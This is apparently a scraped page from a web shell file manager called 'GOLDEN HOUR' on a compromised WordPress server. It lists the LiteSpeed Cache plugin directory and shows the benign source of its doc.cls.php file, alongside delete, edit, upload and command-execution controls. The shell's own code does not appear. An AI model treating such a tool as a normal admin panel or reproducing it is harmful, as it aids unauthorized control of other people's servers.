GOLDEN HOUR
DIR: /home/vlabbdco/public_html/wp-content/plugins/litespeed-cache/src
UP
UPLOAD
Name
Size
Action
activation.cls.php
15.06 KB
DEL
admin-display.cls.php
33.69 KB
DEL
admin-settings.cls.php
9.15 KB
DEL
admin.cls.php
5.2 KB
DEL
api.cls.php
11.28 KB
DEL
avatar.cls.php
6.26 KB
DEL
base.cls.php
30.85 KB
DEL
[ cdn ]
-
DEL
cdn-setup.cls.php
9.63 KB
DEL
cdn.cls.php
13.52 KB
DEL
cloud.cls.php
38.96 KB
DEL
conf.cls.php
18.83 KB
DEL
control.cls.php
20.35 KB
DEL
core.cls.php
17.39 KB
DEL
crawler-map.cls.php
13.42 KB
DEL
crawler.cls.php
30.77 KB
DEL
css.cls.php
13.02 KB
DEL
data.cls.php
16.52 KB
DEL
data.upgrade.func.php
21.85 KB
DEL
[ data_structure ]
-
DEL
db-optm.cls.php
8.66 KB
DEL
debug2.cls.php
11.98 KB
DEL
doc.cls.php
3.54 KB
DEL
error.cls.php
6.38 KB
DEL
esi.cls.php
26.45 KB
DEL
file.cls.php
10.47 KB
DEL
gui.cls.php
27.87 KB
DEL
health.cls.php
3 KB
DEL
htaccess.cls.php
24.34 KB
DEL
img-optm.cls.php
55.77 KB
DEL
import.cls.php
4.32 KB
DEL
instance.cls.php
153 B
DEL
lang.cls.php
16.6 KB
DEL
localization.cls.php
3.53 KB
DEL
media.cls.php
27.13 KB
DEL
metabox.cls.php
3.94 KB
DEL
object-cache.cls.php
15.82 KB
DEL
object.lib.php
14.43 KB
DEL
optimize.cls.php
34.61 KB
DEL
optimizer.cls.php
8.82 KB
DEL
placeholder.cls.php
14.5 KB
DEL
purge.cls.php
29.84 KB
DEL
report.cls.php
5.43 KB
DEL
rest.cls.php
7.52 KB
DEL
root.cls.php
12.88 KB
DEL
router.cls.php
17.7 KB
DEL
str.cls.php
1.18 KB
DEL
tag.cls.php
8.78 KB
DEL
task.cls.php
4.41 KB
DEL
tool.cls.php
3.41 KB
DEL
ucss.cls.php
13.36 KB
DEL
utility.cls.php
21.15 KB
DEL
vary.cls.php
19.44 KB
DEL
vpi.cls.php
7.44 KB
DEL
Edit: doc.cls.php
<?php /** * The Doc class. * * @since 2.2.7 * @package LiteSpeed * @subpackage LiteSpeed/src * @author LiteSpeed Technologies <info@litespeedtech.com> */ namespace LiteSpeed; defined( 'WPINC' ) || exit; class Doc { // protected static $_instance; /** * Changes affect crawler list warning * * @since 4.3 * @access public */ public static function crawler_affected() { echo '<font class="litespeed-primary">'; echo '⚠️ ' . __( 'This setting will regenerate crawler list and clear the disabled list!' , 'litespeed-cache' ); echo '</font>'; } /** * Privacy policy * * @since 2.2.7 * @access public */ public static function privacy_policy() { return __( 'This site utilizes caching in order to facilitate a faster response time and better user experience. Caching potentially stores a duplicate copy of every web page that is on display on this site. All cache files are temporary, and are never accessed by any third party, except as necessary to obtain technical support from the cache plugin vendor. Cache files expire on a schedule set by the site administrator, but may easily be purged by the admin before their natural expiration, if necessary. We may use QUIC.cloud services to process & cache your data temporarily.', 'litespeed-cache' ) . sprintf( __( 'Please see %s for more details.', 'litespeed-cache' ), '<a href="https://quic.cloud/privacy-policy/" target="_blank">https://quic.cloud/privacy-policy/</a>' ); } /** * Learn more link * * @since 2.4.2 * @access public */ public static function learn_more( $url, $title = false, $self = false, $class = false, $return = false ) { if ( ! $class ) { $class = 'litespeed-learn-more'; } if ( ! $title ) { $title = __( 'Learn More', 'litespeed-cache' ); } $self = $self ? '' : "target='_blank'"; $txt = " <a href='$url' $self class='$class'>$title</a>"; if ( $return ) { return $txt; } echo $txt; } /** * One per line * * @since 3.0 * @access public */ public static function one_per_line( $return = false ) { $str = __( 'One per line.', 'litespeed-cache' ); if ( $return ) { return $str; } echo $str; } /** * One per line * * @since 3.4 * @access public */ public static function full_or_partial_url( $string_only = false ) { if ( $string_only ) { echo __( 'Both full and partial strings can be used.', 'litespeed-cache' ); } else { echo __( 'Both full URLs and partial strings can be used.', 'litespeed-cache' ); } } /** * Notice to edit .htaccess * * @since 3.0 * @access public */ public static function notice_htaccess() { echo '<font class="litespeed-primary">'; echo '⚠️ ' . __( 'This setting will edit the .htaccess file.', 'litespeed-cache' ); echo ' <a href="https://docs.litespeedtech.com/lscache/lscwp/toolbox/#edit-htaccess-tab" target="_blank" class="litespeed-learn-more">' . __( 'Learn More', 'litespeed-cache' ) . '</a>'; echo '</font>'; } /** * Notice for whitelist IPs * * @since 3.0 * @access public */ public static function notice_ips() { echo '<div class="litespeed-primary">'; echo '⚠️ ' . sprintf( __( 'For online services to work correctly, you must allowlist all %s server IPs.', 'litespeed-cache' ), 'QUIC.cloud' ) . '<br/>'; echo ' ' . __( 'Before generating key, please verify all IPs on this list are allowlisted', 'litespeed-cache' ) . ': '; echo '<a href="' . Cloud::CLOUD_IPS . '" target="_blank">' . __( 'Current Online Server IPs', 'litespeed-cache' ) . '</a>'; echo '</div>'; } }
SAVE FILE
TERMINAL
EXEC